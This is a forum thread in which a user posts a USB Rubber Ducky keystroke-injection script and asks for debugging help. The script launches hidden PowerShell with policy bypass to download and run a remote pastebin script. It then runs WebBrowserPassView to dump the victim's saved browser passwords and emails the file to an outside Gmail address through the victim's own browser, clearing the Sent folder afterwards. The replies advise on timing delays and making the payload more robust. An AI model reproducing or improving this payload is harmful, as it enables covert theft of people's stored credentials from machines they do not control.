Jump to content
Sign in to follow this  
Rosscovill

Not sure why it's doing this

Recommended Posts

It's giving me an error "windows can not find wershell" wtf Where does it tell the duck to type wer shell? Can someone help with this?

 

DELAY 1000
GUI r
STRING powershell -ep bypass -w h -c "IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/DOWNLOADWBPV')"
ENTER
DELAY 4000
ALT F4
DELAYpow 50
GUI r
STRING C:\temp\WebBrowserPassView.exe
ENTER
DELAY 500
CTRL A
DELAY 50
CTRL S
DELAY 100
STRING Passwords11
ENTER
DELAY 500
ALT F4
DELAY 50
GUI r
STRING C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
ENTER
DELAY 500
STRING gmail.com
ENTER
DELAY 500
CTRL F
STRING Compose
CTRL ENTER
ENTER
DELAY 500
STRING EMAILTOEMAIL@gmail.com
TAB
TAB
DELAY 500
STRING Email
TAB
DELAY 150
STRING Attatched
DELAY 150
TAB
TAB
DELAY 100
TAB
CTRL L
DELAY 150
STRING Documents
ENTER
DELAY 200
TAB
TAB
TAB
TAB
TAB
TAB
DELAY 150
STRING Passwords11
ENTER
DELAY 100
TAB
ENTER
DELAY 150
CTRL F
STRING Sent
CTRL ENTER
DELAY 150
TAB
TAB
TAB
DELAY 100
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
TAB
DELAY 100
DOWNARROW
ENTER
DELAY 100
TAB
TAB
TAB
ENTER
DELAY 200
ALT F4

Share this post


Link to post
Share on other sites
24 minutes ago, kdodge said:

https://pastebin.com/DOWNLOADWBPV

is not a valid page, maybe you need to update that?

That's not the actual pastebin that bit should work I past the command to run and it works. rubber ducky seems to be not writing the words I want I guess?? Also how did I do with the DELAY? Wasn't too sure how to do it

  • Like 1

Share this post


Link to post
Share on other sites

It's probably trying to type powershell before the run box is fully open.  I'd put a small delay between gui r and your first powershell string command.  I find that all computers are different and a script setup with delays runs perfect on one machine and crash and burn on another.

  • Upvote 1

Share this post


Link to post
Share on other sites

everything after the first powershell command, could that be added into the download script? i feel like the less DELAY commands that you have to add in the less you will need to rely on getting the timing correct and more robust your overall payload will be. 

A while back I had been playing around with writing some Ducky Firmware that would start by toggling the SHIFT key over and over while it looked for a change in state of the shift status, there by knowing when the keyboard was finally loaded, and then it would start typing the payload. It would have eliminated the need for the first DELAY (because every computer needs a different about of time to start) but I never got it working properly.  

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...